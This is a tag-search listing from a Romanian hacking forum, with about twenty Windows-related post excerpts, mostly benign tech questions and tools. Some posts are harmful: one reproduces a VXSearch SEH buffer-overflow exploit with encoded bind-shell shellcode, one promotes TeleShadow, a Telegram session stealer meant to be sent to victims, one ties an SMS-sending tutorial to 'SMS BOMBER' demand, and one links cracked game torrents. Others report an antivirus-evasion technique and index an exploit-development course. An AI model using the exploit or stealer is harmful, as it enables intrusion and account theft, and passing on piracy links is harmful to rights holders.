Jump to content

Search the Community

Showing results for tags 'windows'.

The search index is currently processing. Current results may not be complete.
  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Salut rst. Asa cum spune si titlul am sa va prezint cele doua metode cunoscute de mine pentru a trimite sms-uri din PC folosind un telefon android sau modem USB. 1. SMS-uri prin telefon cu android. Necesare: a. Telefon cu android (e musai ca telefonul sa beneficieze de conexiune wifi) b. Aplicatia moca SMS Gateway disponibila in Google play. [Aplicatia nu mai este disponibila in Google Play. Link de download sub articol] Dupa instalarea deschidem aplicatia si mergem in Settings, bifam "Listen for HTTP send SMS commands". Mai jos, in tab-ul HTTP SETTINGS, completam campul "Require password in URL" cu parola dorita. Dupa completarea parolei dai BACK si apoi START (In acest moment aplicatia trebuie sa-ti indice Status: RUNNING) Pentru a trimite sms va trebuii sa accesezi in browser urmatorul link: http://192.168.1.4:9090/sendsms?phone=0729XXXXXX&text=mesajsms&password=parola-ta Unde: 192.168.1.4 e IP-ul telefon-ului, asadar vezi ce ip are telefonul tau si inlocuieste-l. 0729XXXXXX numarul de telefon al destinatarului; parola-ta parola completata in pasul de mai sus De aici iti poti pune imaginatia la lucru` si poti implementa alte metode de a trimite sms-uri. Spre exemplu folosind PHP. 2. SMS-uri prin modem USB. Doh, aici e ceva mai greu insa cireasa de pe tort e faptul ca prin aceasta metoda putem trimite SMS-uri FLASH, adica ceva de genu`: Exemplu1, Exemplu2, Exemplu3. Necesare: a. Modem USB + sim (in cazul de fata folosesc un modem Vodafone K3565) 1. Instalati modem-ul in PC (Asigurati-va ca driver-ele sunt corect instalate ) 2. Descarcati GAMMU (recomand Gammu-1.33.0-Windows-64bit.zip) 3. Extrageti arhiva in 😄 si redenumeste-o in "gammu". 4. Dupa redenumire dute in: gammu/share/doc/gammu/examples/config/ si copiaza fisierele "gammurc" si "smsdrc" in C:\gammu\bin. 5. Dupa copierea fisierelor deschide "gammurc" din "C:\gammu\bin" (folosind notepad sau notepad++) 6. Aici o sa editam doar 2 linii: 6.a - device = com4 - Ei bine com4 va trebuii inlocuit cu COM-ul folosit de modemul tau. In cazul meu com3 6.b - connection = irdaphonet - Aici sterge irdaphonet si pune at115200. 6.c Dupa editare fisierul trebuie sa arate asa (mai putin com3, difera de la caz la caz): Salveaza si inchide. 7. Pentru a ne asigura ca totul este in regula iar gammu comunica cu modeul USB, deschide CMD si scrie: cd c:/gammu/bin 8. In aceasi fereastra scrie: gammu identify Daca COM-ul editat mai sus este cel corect, gammu identifica modem-ul. 9. Din acest moment poti trimite sms-uri folosind aceste comenzi: SMS gammu sendsms TEXT 0729XXXXXX -text "RST TEST." FLASH SMS In urma testelor am constatat ca acest tip de sms-uri adica CLASS 0 nu mai sunt permise de operator, in cazul meu Vodafone. gammu sendsms TEXT 0729XXXXXX -flash -text "RST TEST." DOWNLOAD SMSGATEWAY PS: Nu exista o sursa exacta a tutorial-ului. Tot cea ce gasiti aici este cea ce am invatat eu din mai multe tutoriale atunci cand am vrut sa pun la punct "celebrul" site de trimis sms-uri. . Am facut acest tutorial in urma cererii tot mai mare de SMS BOMBER si nu numai. Sper sa va ajute. Daca aveti nelamuriri nu ezitati sa-mi scrieti. ZbYe PSS: DACA TOT COPIATI ARTICOLUL PUNETI SI VOI MACAR UN LINK CATRE RST! PENTRU SUPORT NU DE ALTA...
  2. Salutare,am revenit cu un topic destul de interesant zic eu pentru cei pasionati de jocurile Rockstar. Am pentru voi GTA 5 varianta pentru [PC]! Link download torrent: Download Grand Theft Auto V / GTA 5 (v1.0.323.1, CRACKED, MULTI11) [FitGirl Initial Repack] Torrent - Kickasse Link download crack for GTA 5: Download Grand Theft Auto V [Crack V2 - for Windows 7 / 8 / 8.1] Torrent - Kickasse Cerinte de sistem minime: Operating System: Windows 8.1 64 Bit, Windows 8 64 Bit, Windows 7 64 Bit Service Pack 1, Windows Vista 64 Bit Service Pack 2* (*NVIDIA video card recommended if running Vista OS) Processor: Intel Core 2 Quad CPU Q6600 @ 2.40GHz (4 CPUs) / AMD Phenom 9850 Quad-Core Processor (4 CPUs) @ 2.5GHz - actually works on dual-core CPUs as well RAM: 4 GB Video Card: NVIDIA 9800 GT 1GB / AMD HD 4870 1GB (DX 10, 10.1, 11) DirectX: 10 HDD Space: 57 GB (~95 GB during installation of this repack) Sper ca vam fost de ajutor si am postat unde trebuie(CRED) Multumesc pentru timpul acordat! Cu stima,JrNasti.PPOW
  3. Cum as putea sa vad modulele importate de un executabil intr-un mod automat si rapid a unui executabil windows? Am niste fisiere/executabile care in fisier raw nu are importate anumite dll-uri pe care le folosesti si am nevoie sa stiu ce dll-uri sau functii de winapi foloseste in executia lui; Se poate vedea asta intr-o anumita masura si sa se poata face asta intr-un mod automat(gen script python sau commandline tool)? Pana acum am gasit dependency walker dar nu pare sa pot automatiza procesul si dureaza un pic pana obtin lista de dll-uri, respectiv listdlls de la sysinternals, dar e pentru procese care ruleaza deja, nu pentru fisiere/executabile statice
  4. A team of security researchers has discovered a new malware evasion technique that could help malware authors defeat most of the modern antivirus solutions and forensic tools. Dubbed Process Doppelgänging, the new fileless code injection technique takes advantage of a built-in Windows function and an undocumented implementation of Windows process loader. Ensilo security researchers Tal Liberman and Eugene Kogan, who discovered the Process Doppelgänging attack, presented their findings today at Black Hat 2017 Security conference held in London. Process Doppelgänging Works on All Windows Versions Apparently, Process Doppelgänging attack works on all modern versions of Microsoft Windows operating system, starting from Windows Vista to the latest version of Windows 10. Tal Liberman, the head of the research team at enSilo, told The Hacker New that this malware evasion technique is similar to Process Hollowing—a method first introduced years ago by attackers to defeat the mitigation capabilities of security products. In Process Hollowing attack, hackers replace the memory of a legitimate process with a malicious code so that the second code runs instead of the original, tricking process monitoring tools and antivirus into believing that the original process is running. Since all modern antivirus and security products have been upgraded to detect Process Hollowing attacks, use of this technique is not a great idea anymore. On the other hand, Process Doppelgänging is an entirely different approach to achieve the same, by abusing Windows NTFS Transactions and an outdated implementation of Windows process loader, which was originally designed for Windows XP, but carried throughout all later versions of Windows. Here's How the Process Doppelgänging Attack Works: Before going further on how this new code injection attack works, you need to understand what Windows NTFS Transaction is and how an attacker could leverage it to evade his malicious actions. NTFS Transaction is a feature of Windows that brings the concept of atomic transactions to the NTFS file system, allowing files and directories to be created, modified, renamed, and deleted atomically. NTFS Transaction is an isolated space that allows Windows application developers to write file-output routines that are guaranteed to either succeed completely or fail completely. According to the researcher, Process Doppelgänging is a fileless attack and works in four major steps as mentioned below: Transact—process a legitimate executable into the NTFS transaction and then overwrite it with a malicious file. Load—create a memory section from the modified (malicious) file. Rollback—rollback the transaction (deliberately failing the transaction), resulting in the removal of all the changes in the legitimate executable in a way they never existed. Animate—bring the doppelganger to life. Use the older implementation of Windows process loader to create a process with the previously created memory section (in step 2), which is actually malicious and never saved to disk, "making it invisible to most recording tools such as modern EDRs." Process Doppelgänging Evades Detection from Most Antiviruses Liberman told The Hacker News that during their research they tested their attack on security products from Windows Defender, Kaspersky Labs, ESET NOD32, Symantec, Trend Micro, Avast, McAfee, AVG, Panda, and even advance forensic tools. In order to demonstrate, the researchers used Mimikatz, a post-exploitation tool that helps extract credentials from the affected systems, with Process Doppelgänging to bypass antivirus detection. When the researchers ran Mimikatz generally on a Windows operating system, Symantec antivirus solution caught the tool immediately, as shown below: However, Mimikatz ran stealthy, without antivirus displaying any warning when executed using Process Doppelgänging, as shown in the image at top of this article. Liberman also told us that Process Doppelgänging works on even the latest version of Windows 10, except Windows 10 Redstone and Fall Creators Update, released earlier this year. But due to a different bug in Windows 10 Redstone and Fall Creators Update, using Process Doppelgänging causes BSOD (blue screen of death), which crashes users' computers. Ironically, the crash bug was patched by Microsoft in later updates, allowing Process Doppelgänging to run on the latest versions of Windows 10. I don't expect Microsoft to rush for an emergency patch that could make some software relying on older implementations unstable, but Antivirus companies can upgrade their products to detect malicious programs using Process Doppelgänging or similar attacks. This is not the very first time when enSilo researchers have discovered a malware evasion technique. Previously they discovered and demonstrated AtomBombing technique which also abused a designing weakness in Windows OS. In September, enSilo researchers also disclosed a 17-year-old programming error in Microsoft Windows kernel that prevented security software from detecting malware at runtime when loaded into system memory. Via thehackernews.com
  5. TeleShadow Stealing desktop telegrams has never been so easy ! Set the email and sender details of the sender and recipient and send it to the victim after compiling. How do I use the session file? Delete everything inside folder at "C:\Users\YourName\AppData\Roaming\Telegram Desktop\tdata" Then Replace Uncompressed files inside tdata folder who resiver from victim to your telegram tdata ! What features does it have? Bypass Two-step confirmation Bypass Inherent identity and need 5-digit verification code Support for the official telegram and IGram desktop unofficial only windows ! Thanks to jeje Plus mr3chb1 Rojhelat Report bugs Telegram : @N3verlove Disclaimer: The consequences of any use shall be borne by the person and the manufacturer or the publisher shall not be liable to any Download: TeleShadow-master.zip or git clone https://github.com/ParsingTeam/TeleShadow.git Source: https://github.com/ParsingTeam/TeleShadow
  6. #!/usr/bin/env python # # Exploit Title : VXSearch v10.2.14 Local SEH Overflow # Date : 11/16/2017 # Exploit Author : wetw0rk # Vendor Homepage : http://www.flexense.com/ # Software link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe # Version : 10.2.14 # Tested on : Windows 7 (x86) # Description : VX Search v10.2.14 suffers from a local buffer overflow. The # following exploit will generate a bind shell on port 1337. I # was unable to get a shell working with msfvenom shellcode so # below is a custom alphanumeric bind shell. Greetz rezkon ;) # # trigger the vulnerability by : # Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name # import struct shellcode = "w00tw00t" shellcode += ( "\x25\x4a\x4d\x4e\x55" # and eax, 0x554e4d4a "\x25\x35\x32\x31\x2a" # and eax, 0x2a313235 "\x2d\x6a\x35\x35\x35" # sub eax, 0x3535356a "\x2d\x65\x6a\x6a\x65" # sub eax, 0x656a6a65 "\x2d\x61\x64\x4d\x65" # sub eax, 0x654d6461 "\x50" # push eax "\x5c" # pop esp ) shellcode += ( "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4f\x4f\x4f\x4f" "\x2d\x4f\x30\x4f\x68\x2d\x62\x2d\x62\x72\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x76\x57\x57\x63\x2d\x77\x36\x39" "\x32\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x54" "\x54\x54\x2d\x25\x54\x7a\x2d\x2d\x25\x52\x76\x36\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49\x35\x49\x49\x2d\x49" "\x25\x49\x69\x2d\x64\x25\x72\x6c\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x70\x33\x33\x25\x2d\x70\x25\x70\x25\x2d" "\x4b\x6a\x56\x39\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x79\x55\x75\x32\x2d\x79\x75\x75\x55\x2d\x79\x77\x77\x78" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x4a\x4a" "\x25\x2d\x39\x5f\x4d\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x4b\x57\x4b\x57\x2d\x70\x76\x4b\x79\x2d\x70\x76" "\x78\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49" "\x49\x49\x49\x2d\x49\x4e\x64\x49\x2d\x78\x25\x78\x25\x2d\x6f" "\x25\x7a\x48\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x58\x58\x38\x58\x2d\x58\x30\x32\x58\x2d\x51\x46\x2d\x47\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5f\x52\x5f\x5f" "\x2d\x5f\x25\x25\x35\x2d\x62\x39\x25\x25\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x4a\x4a\x4a\x4a\x2d\x4a\x4a\x4a" "\x4a\x2d\x79\x39\x4a\x79\x2d\x6d\x32\x4b\x68\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x30\x71\x30\x2d\x30\x25" "\x71\x30\x2d\x38\x31\x51\x5f\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x32\x32\x32\x32\x2d\x78\x77\x7a\x77\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x62\x62\x62\x62\x2d" "\x48\x57\x47\x4f\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x76\x76\x4f\x4f\x2d\x36\x39\x5a\x5a\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x61\x61\x61\x61\x2d\x4a\x61\x4a" "\x25\x2d\x45\x77\x53\x35\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x63\x63\x63\x63\x2d\x39\x63\x63\x2d\x2d\x32\x63" "\x7a\x25\x2d\x31\x49\x7a\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x72\x79\x79\x79\x2d\x25\x30\x25\x30\x2d\x25" "\x32\x25\x55\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x58\x58\x41\x58\x2d\x58\x58\x25\x77\x2d\x6e\x51\x32\x69\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x48\x77\x38\x48" "\x2d\x4e\x76\x6e\x61\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x41\x41\x6e\x6e\x2d\x31\x31\x30\x6e\x2d\x37\x36\x30" "\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x38\x38" "\x38\x38\x2d\x38\x79\x38\x25\x2d\x38\x79\x38\x25\x2d\x58\x4c" "\x73\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x61" "\x52\x61\x52\x2d\x37\x4a\x31\x49\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x4d\x47\x4d\x4d\x2d\x30\x25\x4d\x6b\x2d" "\x36\x32\x66\x71\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x36\x43\x43\x6c\x2d\x33\x54\x47\x25\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x4c\x4c\x4c\x4c\x2d\x6e\x4c\x6e" "\x36\x2d\x65\x67\x6f\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x25\x25\x4b\x4b\x2d\x25\x25\x6f\x4b\x2d\x4e\x41" "\x59\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41" "\x41\x41\x41\x2d\x52\x52\x78\x41\x2d\x6e\x6c\x70\x25\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x6c\x30\x30\x2d" "\x30\x6c\x6c\x30\x2d\x38\x70\x79\x66\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x42\x70\x70\x45\x2d\x32\x45\x70\x31" "\x2d\x25\x4b\x49\x31\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x25\x50\x50\x50\x2d\x25\x7a\x72\x25\x2d\x4e\x73\x61" "\x52\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x77" "\x74\x74\x2d\x61\x78\x35\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x30\x30\x30\x30\x2d\x30\x30\x59\x30\x2d\x30" "\x30\x74\x51\x2d\x6b\x36\x79\x67\x50\x25\x4a\x4d\x4e\x55\x25" "\x35\x32\x31\x2a\x2d\x75\x38\x43\x43\x2d\x7a\x31\x43\x43\x2d" "\x7a\x2d\x77\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x59\x59\x59\x59\x2d\x59\x59\x59\x59\x2d\x6f\x6c\x4d\x77" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45" "\x45\x2d\x34\x2d\x76\x45\x2d\x37\x25\x5a\x65\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x34\x34\x34\x34\x2d\x62\x34" "\x34\x34\x2d\x6d\x56\x47\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35" "\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x76\x2d\x2d\x76\x2d\x55" "\x4c\x55\x7a\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d" "\x77\x77\x77\x30\x2d\x47\x47\x79\x30\x2d\x42\x42\x39\x34\x50" "\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x75\x36\x51" "\x2d\x42\x61\x49\x43\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x56\x56\x31\x56\x2d\x31\x79\x31\x25\x2d\x50\x6c\x48" "\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x72\x72" "\x72\x72\x2d\x72\x25\x38\x38\x2d\x38\x25\x25\x25\x2d\x54\x41" "\x30\x30\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47" "\x47\x47\x76\x2d\x47\x47\x76\x76\x2d\x6b\x72\x6c\x5a\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x71\x25\x71\x2d" "\x73\x42\x63\x68\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a" "\x2d\x48\x55\x51\x51\x2d\x45\x78\x4f\x5a\x50\x25\x4a\x4d\x4e" "\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45\x32\x2d\x45\x45\x25" "\x31\x2d\x76\x75\x2d\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32" "\x31\x2a\x2d\x6e\x4f\x6d\x6e\x2d\x35\x48\x5f\x5f\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x71" "\x2d\x2d\x71\x2d\x71\x2d\x4a\x71\x2d\x66\x65\x70\x62\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x30\x56\x30\x2d" "\x56\x38\x25\x30\x2d\x74\x37\x25\x45\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x32\x32\x32\x77\x2d\x32\x32\x32\x32" "\x2d\x43\x41\x4a\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31" "\x2a\x2d\x63\x63\x63\x30\x2d\x79\x41\x41\x6e\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4b\x4b\x4b\x4b\x2d\x4b\x4b" "\x25\x31\x2d\x4b\x71\x25\x32\x2d\x4f\x6e\x25\x2d\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x37\x37\x37\x37\x2d\x6d" "\x37\x6d\x37\x2d\x6d\x37\x6d\x37\x2d\x64\x55\x63\x58\x50\x25" "\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x44\x6c\x6c\x6c\x2d" "\x34\x44\x44\x6c\x2d\x30\x33\x4e\x54\x50\x25\x4a\x4d\x4e\x55" "\x25\x35\x32\x31\x2a\x2d\x2d\x7a\x43\x2d\x2d\x48\x79\x71\x47" "\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x41\x41" "\x41\x2d\x41\x46\x71\x25\x2d\x5a\x77\x7a\x32\x50\x25\x4a\x4d" "\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47\x47\x47\x47\x2d\x47\x6e" "\x47\x6e\x2d\x47\x78\x6e\x78\x2d\x47\x79\x77\x79\x50\x25\x4a" "\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x74\x38\x69\x38\x2d\x51" # 0day.today [2017-11-17] # Source: 0day.today
  7. Salut! Stie careva un windows 7 custom care sa ruleze mai bine ca originalul? Vazusem in trecut niste versiuni dar nu le mai pot gasi .. Calculatorul meu are 2 Gb ram procesor AMD A4 3300 APU with HD graphics 2.5 GHz ( are overclock la 3.2 GHz) In viitor o sa.mi iau un leptop cu 4 gb ram sau 8 ( depinde de buget ) si as vrea sa ii pun un windows custom dar sa fie bun si eficient .
  8. ADS stands for Alternate Data Stream. It is a file attribute only found on the NTFS file system. ADS is the lesser known feature of Windows NTFS file system which provides the ability to put data into existing files and folders without affecting their functionality and size. It is used legitimately by Windows and other applications to store additional information (for example summary information) for the file. Even 'Internet Explorer' adds the stream named 'Zone.Identifier' to every file downloaded from the internet. ADS have been given a bad reputation because their capability to hide data from us on our own computer, has been abused by malware writers in the past. More info: Technet Microsoft Blog Malware Bytes Blog on ADS ADS on rootkitanalytics.com More on NTFS Tool to identify ADS on Windows Systems: ADS-Revealer Stay safe!
  9. Salut , ma numesc Mihai , am nevoie de cineva care se pricepe cu windows , in special legat de partea administrator , dau mai multe detalii in privat , as fii foarte recunoscator daca m.ati putea ajuta ! Pentru voi nu cred ca ar fii o problema , pt mine este ca nu stiu mai nimic legat de ''heck.uiala'' din asta .)) , Astept Pm in privat ! ps > scuze ca am postat aici , nu stiam unde sa creez topic , sunt nivel 0 , incepator . Si am o rugaminte , anume , va rog tare mult sa numai faceti misto , numai dau nume cine , dar pe langa faptul ca vorbiti urat ,va bateti joc unii ... .
  10. Un mic programel pentru a cauta in toate sub-directoarele dintr-un director dat o anumita fraza/cuvant: from os import walk from os.path import join import argparse def get_files(base_path, extension=None): for dirpath, _, filenames in walk(base_path): for filename in filenames: if filename.endswith(extension): yield join(dirpath, filename) def search_sentence_in_files(files, sentence): for filepath in files: with open(filepath) as fp: for line_number, line in enumerate(fp): if sentence in line: yield filepath, line_number, line.strip() def main(files, sentence): results = search_sentence_in_files(files, sentence) for filepath, line, content in results: print('[# FILE PATH #] {} ...'.format(filepath)) print('[# LINE NUMBER #] At line {}'.format(line)) print('[# LINE CONTENT #] Content: {}'.format(content)) print('-' * 80) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Search text in files') parser.add_argument('sentence') parser.add_argument('-p', '--basepath', help='folder in wich files will be examinated', default=r'default_path') parser.add_argument('-e', '--extension', help='extension of files to examine', default='.txt') args = parser.parse_args() files = get_files(args.basepath, args.extension) main(files, args.sentence) Poate fi rulat cu Python 2.x/3.x. Poate primi ca argumente: - cuvantul / fraza dorita - basepath (in ce director sa caute) - extensia fisierelor in care doriti sa cautati fraza / cuvantul dorit. De adaugat: - indexare - regex functionality Enjoy
  11. The Portable Executable (PE) format is a file format for executables, object code, DLLs, FON Font files, and others used in 32-bit and 64-bit versions of Windows operating systems. The PE format is a data structure that encapsulates the information necessary for the Windows OS loader to manage the wrapped executable code. [1] It is called "portable" because you can use it between different versions of Windows OS not among different distros (Linux/OSX). Hope you find it useful! Detect it Easy Exeinfo PE ExplorerSuite PEiD PEStudio Resource Hacker FileAlyzer PEBrowser PEview RunPE Detector [1]: Wikipedia
  12. Policy Analyzer ========= Policy Analyzer is a utility for analyzing and comparing sets of Group Policy Objects (GPOs). It can highlight when a set of Group Policies has redundant settings or internal inconsistencies, and can highlight the differences between versions or sets of Group Policies. It can also compare GPOs against current local policy settings and against local registry settings. And you can export its findings to a Microsoft Excel spreadsheet. Policy Analyzer is a lightweight standalone application that doesn’t require installation, and doesn’t require administrative rights (except for the “local policy” feature). Link: Policy Analyzer
  13. Va salut am un laptop sony vaio mai vechi model pcg-c1xd si nu pot sa instalez windows 98 pe el.Am incercat mai multe metode inclusiv cu discheta.Stima.
  14. Hello RST : Exploit Development Course 2015 --> Free Preface Hi and welcome to this website! I know people don’t like to read prefaces, so I’ll make it short and right to the point. This is the preface to a course about Modern Windows Exploit Development. I chose Windows because I’m very familiar with it and also because it’s very popular. In particular, I chose Windows 7 SP1 64-bit. Enough with Windows XP: it’s time to move on! There are a few full-fledged courses about Exploit Development but they’re all very expensive. If you can’t afford such courses, you can scour the Internet for papers, articles and some videos. Unfortunately, the information is scattered all around the web and most resources are definitely not for beginners. If you always wanted to learn Exploit Development but either you couldn’t afford it or you had a hard time with it, you’ve come to the right place! This is an introductory course but please don’t expect it to be child’s play. Exploit Development is hard and no one can change this fact, no matter how good he/she is at explaining things. I’ll try very hard to be as clear as possible. If there’s something you don’t understand or if you think I made a mistake, you can leave a brief comment or create a thread in the forum for a longer discussion. I must admit that I’m not an expert. I did a lot of research to write this course and I also learned a lot by writing it. The fact that I’m an old-time reverse engineer helped a lot, though. In this course I won’t just present facts, but I’ll show you how to deduce them by yourself. I’ll try to motivate everything we do. I’ll never tell you to do something without giving you a technical reason for it. In the last part of the course we’ll attack Internet Explorer 10 and 11. My main objective is not just to show you how to attack Internet Explorer, but to show you how a complex attack is first researched and then carried out. Instead of presenting you with facts about Internet Explorer, we’re going to reverse engineer part of Internet Explorer and learn by ourselves how objects are laid out in memory and how we can exploit what we’ve learned. This thoroughness requires that you understand every single step of the process or you’ll get lost in the details. As you’ve probably realized by now, English is not my first language (I’m Italian). This means that reading this course has advantages (learning Exploit Development) and disadvantages (unlearning some of your English). Do you still want to read it? Choose wisely To benefit from this course you need to know and be comfortable with X86 assembly. This is not negotiable! I didn’t even try to include an assembly primer in this course because you can certainly learn it on your own. Internet is full of resources for learning assembly. Also, this course is very hands-on so you should follow along and replicate what I do. I suggest that you create at least two virtual machines with Windows 7 SP1 64-bit: one with Internet Explorer 10 and the other with Internet Explorer 11. I hope you enjoy the ride! Contents WinDbg Mona 2 Structure Exception Handling (SEH) Heap Windows Basics Shellcode Exploitme1 (ret eip overwrite) Exploitme2 (Stack cookies & SEH) Exploitme3 (DEP) Exploitme4 (ASLR) Exploitme5 (Heap Spraying & UAF) EMET 5.2 Internet Explorer 10 Reverse Engineering IE From one-byte-write to full process space read/write God Mode (1) God Mode (2) Use-After-Free bug Internet Explorer 11 Part 1 Part 2 Regards NO-MERCY PDF'S Soooooooon Source : http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/
  15. Windows Malware Analysis Essentials Master the fundamentals of malware analysis for the Windows platform and enhance your anti-malware skill set Author: Victor Marak Read: https://www.scribd.com/doc/283049338/Windows-Malware-Analysis-Essentials Download: https://www.sendspace.com/file/rbwzjv
  16. Salut RST am un laptop acer 1690 si vreau sa ii instalez un windows dar nu stiu ce sa setez in boot menu ma puteti ajuta are 512 mb ram si vreau sa instalez un Windows xp . P.S. am luat imaginile de pe internet dar cel din imagin este la fel ca al meu astept raspunsuri ms ;) astea sunt drivere din boot cum trebuie sa le pun scz ca intreb dar sunt incepator si e mai complicat cu pc-uri mai vechi
  17. Salut RST recent mi-am facut Windows 8.1 windowsul vechi mi-a fost virusat si nu mai putea-m sa il accesesz imi spunea "Prepair automatic repair" se mai incarca putin si imi spunea "Diagnosic your Pc" si nu puteam sa il accesez dar puteam sa intru in fisierele de pe pc sa aleg un driver sa se instaleze ceva din "System 32/logfile " undeva pe acolo si am bagat un dvd bootabil cu windows 8.1 in Pc am intrat in el Si am dat click dreapta pe setup dupa aia am dat open si am instalat alt windows intrebarea este cum procedez daca mai am de facut vreodata windows stiu ca era ceva cu F6 sau F7 sau undeva din Boot menu nu stiu, nici cum nu am reusit doar prin metoda prezentata mai sus , cum ar trebuii sa procedez ?
  18. Buna seara!sunt nou pe acest site dar o sa trec la subiect.In trecut am emulat Windows 95 si xp pe o tableta.Mergea bine (si tableta este o "bruta") si m-am gandit sa scap de lag-ul de pe android si sa incerc ceva nou.Se poate instala ca sistem de operare nativ Linux sau Ubuntu?De Windows nu intreb stiu ca trebuie portate driverele.Multumesc!
  19. Salut RST. Am si eu o intrebare. Se poate instala Windows XP direct de pe HDD daca fac o partitie pe care sa pun continutul ISO-ului si sa bootez de pe ea ca sa il instalez? La windows 7 stiu ca se putea daca extrageam undeva continutul iso-ului, cu ceva programel selectam boot.wim apoi copiam continutul pe partitia creata. La restart imi aparea sa aleg Windows7 ca sa intru in windows, sau numele partitiei create pe care daca dadeam incepea instalarea. Se poate face ceva de genul si in cazul XP ?
  20. https://www.finchvpn.com 3gb/pe luna FREE. Merge pe linux,windows,android,ios....
